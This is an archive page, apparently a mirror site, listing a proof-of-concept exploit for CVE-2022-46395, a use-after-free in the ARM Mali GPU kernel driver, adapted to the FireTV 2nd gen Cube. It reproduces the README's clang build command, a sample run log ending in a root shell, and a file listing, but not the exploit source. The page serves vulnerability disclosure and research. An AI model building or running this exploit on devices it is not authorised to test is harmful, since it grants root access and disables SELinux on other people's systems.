Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-46395 PoC — ARM Mali GPU 资源管理错误漏洞

Source
https://github.com/Pro-me3us/CVE_2022_46395_Raven
Associated Vulnerability
Title:ARM Mali GPU 资源管理错误漏洞 (CVE-2022-46395)
Description:An issue was discovered in the Arm Mali GPU Kernel Driver. A non-privileged user can make improper GPU processing operations to gain access to already freed memory. This affects Midgard r0p0 through r32p0, Bifrost r0p0 through r41p0 before r42p0, Valhall r19p0 through r41p0 before r42p0, and Avalon r41p0 before r42p0.
Description
CVE-2022-46395 POC for FireTV 2nd gen Cube (raven)
Readme
## Exploit for CVE-2022-46395 to run on FireTV 2nd gen Cube

This is a fork of security researcher Man Yue Mo's <a href="https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_46395">Pixel 6 POC</a> for CVE-2022-46395.  Read his detailed write-up of the vulnerability <a href="https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug/">here</a>.  Changes have been made to account for FireOS's 32-bit user space. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root.  

The exploit was patched in PS7652/3564 (late August 2023). For reference, the following command was used to compile with clang in ndk-21:
```
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o raven_buf
```
For fastest results, run following a fresh reboot.  On average the POC takes 2-5min to gain root.
```
raven:/ $ /data/local/tmp/raven_buf
Amazon/raven/raven:9/PS7646.3565N/0028085972224:user/amz-p,release-keys
benchmark_time 138
failed after 100
finished reset: 342278966 fault: 338143633 195 err 0 read 3
failed to find pgd, retry
finished reset: 731402639 fault: 724605931 208 err 0 read 3
failed to find pgd, retry
finished reset: 67309348 fault: 66434848 210 err 0 read 3
failed to find pgd, retry
failed after 200
failed after 300
benchmark_time 135
failed after 400
failed after 500
failed after 600
benchmark_time 131
failed after 700
finish reset: 797174916 fault: 788811083 352 err 0 read 3
found pgd at page 6
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001d0 1d0
overwrite addr : 1043001d0 1d0
result 50
raven:/ #
```
File Snapshot

 [4.0K]  /data/pocs/d711b8b29381c95a31287c9ec4e2265d2acf3253
├── [ 241]  log_utils.h
├── [ 50K]  mali_base_jm_kernel.h
├── [ 32K]  mali.h
├── [ 24K]  mali_user_buf.c
├── [2.1K]  mempool_utils.c
├── [ 522]  mempool_utils.h
├── [6.7K]  mem_write.c
├── [1.3K]  mem_write.h
├── [ 11K]  midgard.h
└── [1.8K]  README.md

0 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →